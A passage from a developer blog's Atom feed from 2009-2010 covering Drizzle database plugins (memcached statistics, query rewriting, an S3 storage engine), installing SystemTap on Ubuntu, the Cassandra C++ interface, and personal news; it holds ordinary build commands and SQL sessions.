sources=memcached_stats.cc stats_table.cc analysis_table.cc
build_conditional=&quot;${ac_cv_libmemcached}&quot; = &quot;yes&quot; -a &quot;x${MEMCACHED_BINARY}&quot; != &quot;xno&quot;
ldflags=${LTLIBMEMCACHED}
&lt;/pre&gt;

Once that's done, we need to create a config directory and copy a few files from drizzle's trunk:

&lt;pre&gt;
$ cp $DRIZZLE_SRC_ROOT/config/config.rpath ./config/.
$ cp $DRIZZLE_SRC_ROOT/config/pandora-plugin ./config/.
$ cp -R $DRIZZLE_SRC_PORT/m4 .
&lt;/pre&gt;

Like I said before, Monty is working on a tool that will automate the steps above. Now, we can
proceed and start compiling our plugin:

&lt;pre&gt;
$ ./config/pandora-plugin
$ autoreconf -i
libtoolize: putting auxiliary files in AC_CONFIG_AUX_DIR, `config'.
libtoolize: copying file `config/config.guess'
libtoolize: copying file `config/config.sub'
libtoolize: copying file `config/install-sh'
libtoolize: copying file `config/ltmain.sh'
libtoolize: putting macros in `m4'.
libtoolize: copying file `m4/libtool.m4'
libtoolize: copying file `m4/ltoptions.m4'
libtoolize: copying file `m4/ltsugar.m4'
libtoolize: copying file `m4/ltversion.m4'
libtoolize: copying file `m4/lt~obsolete.m4'
libtoolize: Remember to add `LT_INIT' to configure.ac.
libtoolize: Consider adding `AC_CONFIG_MACRO_DIR([m4])' to configure.ac and
libtoolize: rerunning libtoolize, to keep the correct libtool macros in-tree.
configure.ac:7: installing `config/compile'
configure.ac:7: installing `config/missing'
Makefile.am: installing `config/depcomp'
$ ./configure
...
$ make
make  all-am
make[1]: Entering directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
  CXX    libmemcached_stats_plugin_la-memcached_stats.lo
  CXX    libmemcached_stats_plugin_la-stats_table.lo
  CXX    libmemcached_stats_plugin_la-analysis_table.lo
  CXXLD  libmemcached_stats_plugin.la
make[1]: Leaving directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
$
&lt;/pre&gt;

Now, our plugin is built. To install it, we simply do a make install and give the
--plugin_add=memcached_stats option to drizzled when we start the server.&lt;br&gt;

I just think this process
makes my life a whole lot easier and I wanted to bring some attention to how easy drizzle makes
developing plugins.


</content>
 </entry>
 
 <entry>
   <title>Schema-Free Drizzle!</title>
   <link href="http://posulliv.github.com/2010/03/02/schema-free-drizzle"/>
   <updated>2010-03-02T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/03/02/schema-free-drizzle</id>
   <content type="html">I came across this &lt;a href=&quot;http://www.igvita.com/2010/03/01/schema-free-mysql-vs-nosql/&quot;&gt;post&lt;/a&gt; from 
&lt;a href=&quot;http://www.igvita.com&quot;&gt;Ilya Grigorik&lt;/a&gt; on &lt;a href=&quot;http://news.ycombinator.com/&quot;&gt;Hacker News&lt;/a&gt; 
yesterday and I figured I just had to implement this in Drizzle now with the new query rewriting
interface that I mentioned &lt;a href=&quot;http://posulliv.github.com/2010/03/01/query-rewrite.html&quot;&gt;yesterday&lt;/a&gt;.
The awesome thing about Drizzle is that I can try all these ideas out easily by just implementing a
plugin.
&lt;br&gt;

Any SQL statements we want to use on our schema-free constructs, we have to prefix with the string
'nos'. With that said, here is a session demonstrating this query rewriting plugin:

&lt;pre&gt;
Your Drizzle connection id is 2
Server version: 7 Source distribution (schema-less)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; use test;
Database changed
drizzle&gt; nos create table widgets;
Query OK, 0 rows affected (0.06 sec)

drizzle&gt; nos insert into widgets (id,name) values ('a', 'apple');
Query OK, 1 row affected (0.19 sec)

drizzle&gt; nos insert into widgets (id,name,type) values ('b', 'blackberry', 'phone');
Query OK, 1 row affected (0.21 sec)

drizzle&gt; nos select * from widgets;
+------+------------+-------+
| id   | name       | type  |
+------+------------+-------+
| a    | apple      | NULL  | 
| b    | blackberry | phone | 
+------+------------+-------+
2 rows in set (0 sec)

drizzle&gt; nos select * from widgets where id = 'a';
+------+-------+------+
| id   | name  | type |
+------+-------+------+
| a    | apple | NULL | 
+------+-------+------+
1 row in set (0 sec)

drizzle&gt;
&lt;/pre&gt;
&lt;br&gt;

The code for this is available on Launchpad (lp:~posulliv/drizzle/schema-less). I threw this
together in a few hours today for fun so it is what it is. 

</content>
 </entry>
 
 <entry>
   <title>Query Rewriting Plugin Point for Drizzle</title>
   <link href="http://posulliv.github.com/2010/03/01/query-rewrite"/>
   <updated>2010-03-01T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/03/01/query-rewrite</id>
   <content type="html">One of the first tasks in my new position at &lt;a href=&quot;http://akibainc.com&quot;&gt;Akiban&lt;/a&gt; was to create
a plugin point within Drizzle for query rewriting.
&lt;br&gt;

The first decision to make was where to insert a plugin point for a query rewriter. The parsed
representation of a query would seem like a natural thing to pass to a query rewriter plugin since
the plugin would not have to implement its own parser then. However, the parsed representation of a
query in Drizzle is not the easiest in the world to deal with right now so passing this to a plugin
would make developing a rewriting plugin quite difficult. Thus, I made the decision to create the
plugin point before parsing occurs.
&lt;br&gt;

This means that if a
plugin developer wants to do some complex rewriting, they may need to parse the query in their
plugin. It may not be ideal but it does make the plugin API for query rewriting quite simple and opens
up a lot of interesting opportunities.
&lt;br&gt;

Following the lead of other plugin interfaces such as the replication API developed by &lt;a
href=&quot;http://jpipes.com&quot;&gt;Jay&lt;/a&gt;, I wanted to keep it as simple and easy to understand as possible.
With that in mind, here is the entire API for a query rewriting plugin:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/301690.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Thus, all a plugin developer needs to do is implement the rewrite() function within their plugin.
The query is passed by reference as a std::string so a plugin can do whatever it likes to this
string and this string will then be passed to the parser in the Drizzle core kernel for parsing.
&lt;br&gt;

This interface opens up a lot of possibilties for interesting plugins. For example, one could
develop a plugin to analyze a query for common SQL injection patterns or develop a plugin to rewrite
a query based on a set of rules. I would be really interested in hearing other ideas people reading
this have for plugins using this interface?
&lt;br&gt;

</content>
 </entry>
 
 <entry>
   <title>Installing SystemTap on Ubuntu</title>
   <link href="http://posulliv.github.com/2010/02/26/installing-stap"/>
   <updated>2010-02-26T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/02/26/installing-stap</id>
   <content type="html">I'm presenting at the MySQL user's conference this year and one of my &lt;a
href=&quot;http://en.oreilly.com/mysql2010/public/schedule/detail/12472&quot;&gt;talks&lt;/a&gt; is on using SystemTap and DTrace
with MySQL and Drizzle. I'm also doing a tutorial with &lt;a href=&quot;http://jpipes.com&quot;&gt;Jay Pipes&lt;/a&gt; on
developing replication plugins for Drizzle and that should be a lot of fun.
&lt;br&gt;

I wanted to write some posts before the conference that I can reference
within my talk which detail how to install &lt;a href=&quot;http://sourceware.org/systemtap/&quot;&gt;SystemTap&lt;/a&gt; and configure Drizzle and MySQL for use with
SystemTap. Thus, this post is on how to install SystemTap on Ubuntu while my next post
will go in to details about how to configure MySQL and Drizzle for use with SystemTap.
&lt;br&gt;

Before starting, its worth noting that this post is specific to Ubuntu 9.10. The procedure to follow
may be different on other versions so its worth keeping that in my mind. The first thing we do is
install systemtap and some associated packages which will be needed by Drizzle and MySQL:

&lt;pre&gt;
$ sudo apt-get install systemtap
$ sudo apt-get install systemtap-sdt-dev
&lt;/pre&gt;

Now, being used to Ubuntu, you would think you are good to go now. Unfortunately, attempting to run
SystemTap will probably give you the following error:

&lt;pre&gt;
$ stap -e 'probe kernel.function(&quot;sys_open&quot;) {log(&quot;hello world&quot;) exit()}'
semantic error: libdwfl failure (missing x86_64 kernel/module debuginfo under
'/lib/modules/2.6.31-19-generic/build'): No such file or directory while resolving probe point
kernel.function(&quot;sys_open&quot;)
semantic error: no probes found
Pass 2: analysis failed.  Try again with another '--vp 01' option.
$
&lt;/pre&gt;

The above error occurs because SystemTap needs to have a debug version of the kernel available.
Unfortunately, installing the debug information for a kernel on ubuntu is not a trivial operation to
perform. In fact, there is a &lt;a
href=&quot;https://bugs.launchpad.net/ubuntu/+source/linux/+bug/289087&quot;&gt;bug&lt;/a&gt; on Launchpad about this
issue. Thus, we will build a kernel debug package from source ourselves. This can be done as
follows:

&lt;pre&gt;
$ cd $HOME
$ sudo apt-get install dpkg-dev debhelper gawk
$ mkdir tmp
$ cd tmp
$ sudo apt-get build-dep --no-install-recommends linux-image-$(uname -r)
$ apt-get source linux-image-$(uname -r)
$ cd linux-2.6.31 (this is currently the kernel version of 9.10)
$ fakeroot debian/rules clean
$ AUTOBUILD=1 fakeroot debian/rules binary-generic skipdbg=false
$ sudo dpkg -i ../linux-image-debug-2.6.31-19-generic_2.6.31-19.56_amd64.ddeb
&lt;/pre&gt;

This builds a debug image of the kernel and so will take quite a while. Once we have the above
completed, we can try running our hello world example with SystemTap again. In order to get some
output, you should open or create some file on the system in another terminal window. In this
example, I backgrounded the stap process and created a file:

&lt;pre&gt;
$ sudo stap -e 'probe kernel.function(&quot;sys_open&quot;) {log(&quot;hello world&quot;) exit()}' &amp;
[1] 951
$ touch /tmp/padraig
$ hello world
$ [1]+ Done
&lt;/pre&gt;

Installing SystemTap on CentOS is significantly easier since it is primarily developed by Red Hat. A
good article on how to install it on CentOS is available &lt;a
href=&quot;http://sourceware.org/systemtap/wiki/SystemTapOnCentOS&quot;&gt;here&lt;/a&gt;. 
&lt;br&gt;

In my next post on the topic, I'll explain how to configure MySQL and Drizzle for SystemTap and give
some simple examples of using SystemTap with them.
</content>
 </entry>
 
 <entry>
   <title>Using the C++ Interface with Cassandra</title>
   <link href="http://posulliv.github.com/2010/02/22/cpp-cassandra"/>
   <updated>2010-02-22T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/02/22/cpp-cassandra</id>
   <content type="html">Before starting, Cassandra needs to be downladed and installed. In a &lt;a
href=&quot;http://posulliv.github.com/2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development.html&quot;&gt;previous post&lt;/a&gt;, I
went through the steps involved in setting up a Cassandra cluster so I'm not going to repeat that
here. For this simple example though, I'll be using the following keyspace (which needs to be
present in the storage-conf.xml file):&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/311823.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Once we have cassandra installed and running, we next need to download thrift from its &lt;a
href=&quot;http://incubator.apache.org/thrift/&quot;&gt;Apache
homepage&lt;/a&gt;. I went with the latest stable release which at the
time of writing is 0.2.0. Installation from the tarball is pretty straightforward but ensure to run
ldconfig after installing thrift.&lt;br&gt;

Once thrift is installed, we need to generate the C++ interface for Cassandra (this will be done as
the cassandra user if following the setup in my previous post):

&lt;pre&gt;
$ cd $CASSANDRA_HOME/interface
$ thrift --gen cpp cassandra.thrift
$ ls -ltr
total 44
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 17:57 thrift
-rw-r--r-- 1 cassandra cassandra 21105 2010-02-22 17:57 cassandra.thrift
-rw-r--r-- 1 cassandra cassandra  3359 2010-02-22 17:57 cassandra.avpr
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 18:01 avro
drwxr-xr-x 2 cassandra cassandra  4096 2010-02-22 21:41 gen-cpp
$ mkdir cpp-test
&lt;/pre&gt;

Within the cpp-test directory, I'm going to create a file named simple-test.cc which looks like:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/311827.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

To compile this, I used the following command line (assuming I am in the cpp-test directory):

&lt;pre&gt;
$ g++ -o cpptest -Wall -g \
&gt; -I../gen-cpp/. \
&gt; -I/usr/local/include/thrift \
&gt; -L/usr/local/lib -lstdc++ -lthrift \
&gt; simple-test.cc \
&gt; ../gen-cpp/cassandra_constants.cpp \
&gt; ../gen-cpp/cassandra_types.cpp \
&gt; ../gen-cpp/Cassandra.cpp
$
&lt;/pre&gt;

The above command will produce an executable named cpptest in the cpp-test directory. Assuming
cassandra is started, we run the binary and should obtain output like so:

&lt;pre&gt;
$ ./cpptest 
Column name retrieved is: second
Value in column retrieved is: this is data!!
$
&lt;/pre&gt;

That's a simple example of using the C++ interface to Cassandra. Hopefully, this will prove useful
to someone but it took me longer than expected to get the above simple test working so I figured it
was worth writing up the steps I went through.
</content>
 </entry>
 
 <entry>
   <title>New Job at Akiban</title>
   <link href="http://posulliv.github.com/2010/02/06/new-job-at-akiban"/>
   <updated>2010-02-06T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/02/06/new-job-at-akiban</id>
   <content type="html">&lt;p&gt;I just finished my first week at my new position as a software engineer at &lt;a href='http://akiban.com'&gt;Akiban Technologies&lt;/a&gt; in Boston.&lt;/p&gt;

&lt;p&gt;I&amp;#8217;m really excited about working here. Akiban is a small startup developing some really cool technology that I believe will get people talking about the relational model in a good way again. We are currently based in the South End of Boston. The building where we are located is pretty awesome and not at all what I pictured an office to be like. There is a resident artist in the building who hangs his paintings on the walls and they seem to move to different places at random times. Its a strange feeling to walk in to work in the morning and smell fresh paint as I go to my desk. Definitely not something I expected!&lt;/p&gt;

&lt;p&gt;But besides all that, one of the best things for me about working here is that I get paid to contribute to open source. I&amp;#8217;ve been pretty involved with Drizzle for the last year while still a student and it was always something I really enjoyed which I never thought someone would pay me to work on. The community around the project is awesome and I was just happy to be involved with it. Now that I get paid to contribute, it&amp;#8217;s nice to know that I can still be part of that community without having to worry about how I&amp;#8217;m going to make a living. It&amp;#8217;s weird to be paid for something that I would still be doing anyway without the pay! I&amp;#8217;m not complaining though, it&amp;#8217;s a nice change!&lt;/p&gt;

&lt;p&gt;I&amp;#8217;ll be presenting at the MySQL conference in April, lots of awesome work is happening in the Drizzle project and Akiban will be out of stealth mode by the conference so there are some exciting times ahead!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Moved to GitHub Pages</title>
   <link href="http://posulliv.github.com/2010/01/28/github-move"/>
   <updated>2010-01-28T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/01/28/github-move</id>
   <content type="html">I decided to move my blog to a new hosting provider - &lt;a href=&quot;http://github.com/blog/272-github-pages&quot;&gt;GitHub Pages&lt;/a&gt;. The blogging software used with GitHub is &lt;a href=&quot;http://github.com/mojombo/jekyll/tree/master&quot;&gt;Jekyll&lt;/a&gt;.&lt;br&gt;

I really like the fact that everything is done via a &lt;a href=&quot;http://git-scm.com/&quot;&gt;git&lt;/a&gt; repository. So far, I really like this setup.
</content>
 </entry>
 
 <entry>
   <title>S3 Storage Engine with Memcached in Drizzle</title>
   <link href="http://posulliv.github.com/2009/11/09/s3-storage-engine-with-memcached-in-drizzle"/>
   <updated>2009-11-09T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/11/09/s3-storage-engine-with-memcached-in-drizzle</id>
   <content type="html">Previously, I had ported Brian's &lt;a href=&quot;http://tangent.org/506/memcache_engine.html&quot;&gt;memcached engine&lt;/a&gt; to Drizzle and rencently, I've been doing some work with Amazon's S3 for school. Thus, I decided to have a look at Mark's &lt;a href=&quot;http://fallenpegasus.com/code/mysql-awss3/&quot;&gt;S3 storage engine&lt;/a&gt; for MySQL. Over the last 2 days, I created a new version of the S3 storage engine for Drizzle with the option to use &lt;a href=&quot;http://memcached.org/&quot;&gt;Memcached&lt;/a&gt; as a write-through cache for the S3 backend store. I see this work more as showing the cool things we can do in Drizzle and how quickly we can get prototypes up and running. I don't even know if this is a good idea or anything but its cool to be able to store all data in S3.&lt;br&gt;

First, lets see how to create a table with this engine. The one constraint on tables created with this engine is that they need to have a primary key specified on the table. Each table that is created in this engine is represented as a bucket in S3. So whenever you create a table with this engine, you create a bucket in S3. So lets try creating a table:

&lt;pre&gt;
drizzle&gt; create database demo;
Query OK, 1 row affected (0 sec)

drizzle&gt; use demo;
Database changed
drizzle&gt; create table padara (
    -&gt; a int primary key,
    -&gt; b varchar(255),
    -&gt; c varchar(255)) engine=mcaws;
ERROR 1005 (HY000): Can't create table 'demo.padara' (errno: 1005)
drizzle&gt;
&lt;/pre&gt;

Lets get some more information on why that table creation failed:

&lt;pre&gt;
drizzle&gt; show warnings;
+-------+------+-------------------------------------------------------------------------------------+
| Level | Code | Message                                                                             |
+-------+------+-------------------------------------------------------------------------------------+
| Error | 1005 | Amazon S3 Connection Pool has not been created (Did you specify your credentials?)
 |
| Error | 1005 | Can't create table 'demo.padara' (errno: 1005)                                      |
+-------+------+-------------------------------------------------------------------------------------+
2 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

As you see, we need to specify our Amazon AWS access credentials before we can utilize this store engine. For the moment, I have the following system variables associated with this plugin:

&lt;pre&gt;
drizzle&gt; show variables like '%AWS%';
+-----------------------+-------+
| Variable_name         | Value |
+-----------------------+-------+
| mcaws_accesskey       |       |
| mcaws_mcservers       |       |
| mcaws_secretaccesskey |       |
+-----------------------+-------+
3 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

So I set the AWS access credentials by setting the appropriate system variables (this has to be done before tables can be created with this engine and in this order):

&lt;pre&gt;
drizzle&gt; set global mcaws_accesskey = 'YOUR_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle&gt; set global mcaws_secretaccesskey = 'YOUR_SECRET_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle&gt; show variables like '%AWS%';
+-----------------------+------------------------------------------+
| Variable_name         | Value                                    |
+-----------------------+------------------------------------------+
| mcaws_accesskey       | YOUR_ACCESS_KEY                     |
| mcaws_mcservers       |                                          |
| mcaws_secretaccesskey | YOUR_SECRET_ACCESS_KEY |
+-----------------------+------------------------------------------+
3 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

Before creating the table, lets look at what buckets are associated with my S3 account. I'm going to use the &lt;a href=&quot;http://www.s3fox.net/&quot;&gt;S3Fox&lt;/a&gt; firefox plugin for this (there is multiple other things you could use). Here are the buckets in my S3 account right now:&lt;br&gt;

&lt;img class=&quot;aligncenter size-medium&quot; src=&quot;../../../images/s3fox.png&quot; alt=&quot;&quot; width=&quot;300&quot; height=&quot;270&quot; /&gt;&lt;br&gt;

I just have the one bucket for now. Now, I create a table using the S3 engine after specifying my AWS credentials:

&lt;pre&gt;
drizzle&gt; create table padara (
    -&gt; a int primary key,
    -&gt; b varchar(255),
    -&gt; c varchar(255)) engine=mcaws;
Query OK, 0 rows affected (0.31 sec)

drizzle&gt;
&lt;/pre&gt;

and when I look at my buckets in S3, I should see a new bucket representing the new table I created:&lt;br&gt;

&lt;img class=&quot;aligncenter size-medium&quot; src=&quot;../../../images/s3foxafter.png&quot; alt=&quot;&quot; width=&quot;300&quot; height=&quot;270&quot; /&gt;&lt;br&gt;

As can be seen, the bucket name is the database name concatenated with the table name - 'databasetable'. Next, lets insert some rows in the table and then see what objects are in the bucket:

&lt;pre&gt;
drizzle&gt; insert into padara
    -&gt; values (1, 'padraig', 'sullivan');
Query OK, 1 row affected (0.07 sec)

drizzle&gt; insert into padara
    -&gt; values (2, 'domhnall', 'sullivan');
Query OK, 1 row affected (0.08 sec)

drizzle&gt; insert into padara
    -&gt; values (3, 'tomas', 'sullivan');
Query OK, 1 row affected (0.14 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;img class=&quot;aligncenter size-medium&quot; src=&quot;../../../images/s3foxobjects.png&quot; alt=&quot;&quot; width=&quot;300&quot; height=&quot;270&quot; /&gt;&lt;br&gt;

Now we can query the table. Queries on the table need to specify a primary key value in the WHERE clause for now so we will just be returning one row (I'll be looking into range queries pretty soon):

&lt;pre&gt;
drizzle&gt; select *
    -&gt; from padara
    -&gt; where a = 2;
+---+----------+----------+
| a | b        | c        |
+---+----------+----------+
| 2 | domhnall | sullivan |
+---+----------+----------+
1 row in set (5 sec)

drizzle&gt;
&lt;/pre&gt;

That's basically the simple S3 engine. It works just like a regular storage engine except the data is stored on S3. Of course, the latency involved in interacting with S3 for every request can be quite limiting. For example, the simple query above took 5 seconds to retrieve the data. Thus, I added support for using memcached as a write-through cache for this engine. All we need to do is specify the memcached servers to use in the appropriate system variable:

&lt;pre&gt;
drizzle&gt; set global mcaws_mcservers = 'localhost:19191';
Query OK, 0 rows affected (0 sec)

drizzle&gt;
&lt;/pre&gt;

Now, whenever we query a table created in this engine, we will check for the data in memcached first and if we miss in the cache, only then do we go to S3 for the data. When inserting new data, we insert it in both memcached and S3. Using memcached for this engine is totally optional. It can simply be used as a way to store data in S3 through the engine interface but I thought it might prove to be a useful option for an engine like this.&lt;br&gt;

I wanted to show how clean the code to implement the functionality to do this in the plugin is. This goes to show the benefit of the great build system Monty Taylor has put a lot of work in to in Drizzle. I can easily utilize external libraries in my plugin - in this case &lt;a href=&quot;https://launchpad.net/libmemcached&quot;&gt;libmemcached&lt;/a&gt; and &lt;a href=&quot;http://aws.28msec.com/&quot;&gt;libaws&lt;/a&gt;. The code below first checks for data in memcached and if it is not present there, retrieves the data from S3 and updates memcached before returning to the engine.&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/230509.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

So thats about it for now. In the future, there are a few things I plan on working on for this engine:
&lt;ul&gt;
	&lt;li&gt;removing the need to have a table represented as a bucket in S3 (this design makes the code much simpler for now)&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
	&lt;li&gt; increasing the size of the objects transferred from/to S3 - make the unit of transfer between the engine a page instead of a row as it is now&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
	&lt;li&gt; create I_S tables for monitoring S3 usage&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
	&lt;li&gt; add support for range queries&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
	&lt;li&gt; remove the need for a table to have a primary key&lt;/li&gt;
&lt;/ul&gt;
If you are interested in downloading the branch and playing with it, you can get it and build it by:

&lt;pre&gt;
$ bzr branch lp:~posulliv/drizzle/aws-mc-engine
$ cd aws-mc-engine
$ ./config/autorun.sh &amp;&amp; ./configure &amp;&amp; make
&lt;/pre&gt;

libmemcached and libaws are prequisites that you will need installed before compiling this plugin.

If anyone has any feedback or suggestions on what to do with this, that would be awesome. I really have no idea what to do with it!
</content>
 </entry>
 
 <entry>
   <title>Viewing Memcached Statistics from Drizzle</title>
   <link href="http://posulliv.github.com/2009/09/29/viewing-memcached-statistics-from-drizzle"/>
   <updated>2009-09-29T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/29/viewing-memcached-statistics-from-drizzle</id>
   <content type="html">While working on a few memcached related plugins for Drizzle, I noticed that it would be nice to have the ability to query memcached statistics from an INFORMATION_SCHEMA table. Today I put together a plugin that adds 2 memcached related I_S tables to drizzle.

First, lets see the tables the plugin adds to drizzle along with the columns in each table:
&lt;pre&gt;
drizzle&amp;gt; select table_name
    -&amp;gt; from information_schema.tables
    -&amp;gt; where table_name like '%MEMCACHED%';
+--------------------+
| table_name         |
+--------------------+
| MEMCACHED_STATS    | 
| MEMCACHED_ANALYSIS | 
+--------------------+
2 rows in set (0 sec)

drizzle&amp;gt; desc information_schema.memcached_stats;
+-----------------------+-------------+------+-----+---------+-------+
| Field                 | Type        | Null | Key | Default | Extra |
+-----------------------+-------------+------+-----+---------+-------+
| NAME                  | varchar(32) | NO   |     |         |       | 
| PORT_NUMBER           | bigint      | NO   |     | 0       |       | 
| PROCESS_ID            | bigint      | NO   |     | 0       |       | 
| UPTIME                | bigint      | NO   |     | 0       |       | 
| TIME                  | bigint      | NO   |     | 0       |       | 
| VERSION               | varchar(8)  | NO   |     |         |       | 
| POINTER_SIZE          | bigint      | NO   |     | 0       |       | 
| RUSAGE_USER           | bigint      | NO   |     | 0       |       | 
| RUSAGE_SYSTEM         | bigint      | NO   |     | 0       |       | 
| CURRENT_ITEMS         | bigint      | NO   |     | 0       |       | 
| TOTAL_ITEMS           | bigint      | NO   |     | 0       |       | 
| BYTES                 | bigint      | NO   |     | 0       |       | 
| CURRENT_CONNECTIONS   | bigint      | NO   |     | 0       |       | 
| TOTAL_CONNECTIONS     | bigint      | NO   |     | 0       |       | 
| CONNECTION_STRUCTURES | bigint      | NO   |     | 0       |       | 
| GETS                  | bigint      | NO   |     | 0       |       | 
| SETS                  | bigint      | NO   |     | 0       |       | 
| HITS                  | bigint      | NO   |     | 0       |       | 
| MISSES                | bigint      | NO   |     | 0       |       | 
| EVICTIONS             | bigint      | NO   |     | 0       |       | 
| BYTES_READ            | bigint      | NO   |     | 0       |       | 
| BYTES_WRITTEN         | bigint      | NO   |     | 0       |       | 
| LIMIT_MAXBYTES        | bigint      | NO   |     | 0       |       | 
| THREADS               | bigint      | NO   |     | 0       |       | 
+-----------------------+-------------+------+-----+---------+-------+
24 rows in set (0 sec)

drizzle&amp;gt; desc information_schema.memcached_analysis;
+--------------------------------+-------------+------+-----+---------+-------+
| Field                          | Type        | Null | Key | Default | Extra |
+--------------------------------+-------------+------+-----+---------+-------+
| SERVERS_ANALYZED               | bigint      | NO   |     | 0       |       | 
| AVERAGE_ITEM_SIZE              | bigint      | NO   |     | 0       |       | 
| NODE_WITH_MOST_MEM_CONSUMPTION | varchar(32) | NO   |     |         |       | 
| USED_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LEAST_FREE_SPACE     | varchar(32) | NO   |     |         |       | 
| FREE_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LONGEST_UPTIME       | varchar(32) | NO   |     |         |       | 
| LONGEST_UPTIME                 | bigint      | NO   |     | 0       |       | 
| POOL_WIDE_HIT_RATIO            | bigint      | NO   |     | 0       |       | 
+--------------------------------+-------------+------+-----+---------+-------+
9 rows in set (0.01 sec)

drizzle&amp;gt; 
&lt;/pre&gt;

You might wonder how you specify the memcached servers to obtain statistics on. Well, I created a system variable for that purpose:
&lt;pre&gt;
drizzle&amp;gt; show variables like '%memcached%';
+-------------------------+-------+
| Variable_name           | Value |
+-------------------------+-------+
| memcached_stats_servers |       | 
+-------------------------+-------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, lets set the system variable to a small memcached instance I have running on my laptop:
&lt;pre&gt;
drizzle&amp;gt; set global memcached_stats_servers = 'localhost:11211';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt; show variables like '%memcached%';
+-------------------------+-----------------+
| Variable_name           | Value           |
+-------------------------+-----------------+
| memcached_stats_servers | localhost:11211 | 
+-------------------------+-----------------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

And lets do a simple query on the MEMCACHED_STATS table:

&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses
    -&amp;gt; from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
+----------------------------------+-------------+----------+------+------+------+--------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

The MEMCACHED_ANALYSIS table is not interesting unless there is more than 1 memcached server specified in the system variable. Thus, we need to update that system variable first:
&lt;pre&gt;
drizzle&amp;gt; set global memcached_stats_servers = 'localhost:11211, localhost:11212';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, lets do the same query on MEMCACHED_STATS again:
&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    0 |    0 |    0 |      0 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

So you can see that for each server you specify in the system variable, a row will be output in the table. I'm going to make some activity happen in the second memcached instance I just started on my machine. Another branch I created over the last few days is a port of&lt;a href=&quot;http://krow.livejournal.com/&quot;&gt; Brian&lt;/a&gt;'s &lt;a href=&quot;http://tangent.org/506/memcache_engine.html&quot;&gt;memcached engine&lt;/a&gt; to drizzle. So I'm going to create a table using the memcached engine and then insert some data into that table:

&lt;pre&gt;
drizzle&amp;gt; create table test_data (
    -&amp;gt; a int primary key,
    -&amp;gt; b int,
    -&amp;gt; c varchar(64))
    -&amp;gt; engine=memcached;
Query OK, 0 rows affected (0.01 sec)

drizzle&amp;gt; insert into test_data
    -&amp;gt; values (1, 2, &quot;this will be stored in memcached&quot;);
Query OK, 1 row affected (0.01 sec)

drizzle&amp;gt; select b, c 
    -&amp;gt; from test_data
    -&amp;gt; where a = 1;
+------+----------------------------------+
| b    | c                                |
+------+----------------------------------+
|    2 | this will be stored in memcached | 
+------+----------------------------------+
1 row in set (0 sec)

drizzle&amp;gt; select b, c  from test_data where a = 2;
Empty set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, lets query the statistics again:

&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    2 |    1 |    1 |      1 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0.01 sec)

drizzle&amp;gt;
&lt;/pre&gt;

And we can see they have been updated as expected. Now, lets look at the MEMCACHED_ANALYSIS table. I'm just going to query the first 2 columns of this table:
&lt;pre&gt;
drizzle&amp;gt; select servers_analyzed, average_item_size
    -&amp;gt; from information_schema.memcached_analysis;
+------------------+-------------------+
| servers_analyzed | average_item_size |
+------------------+-------------------+
|                2 |                86 | 
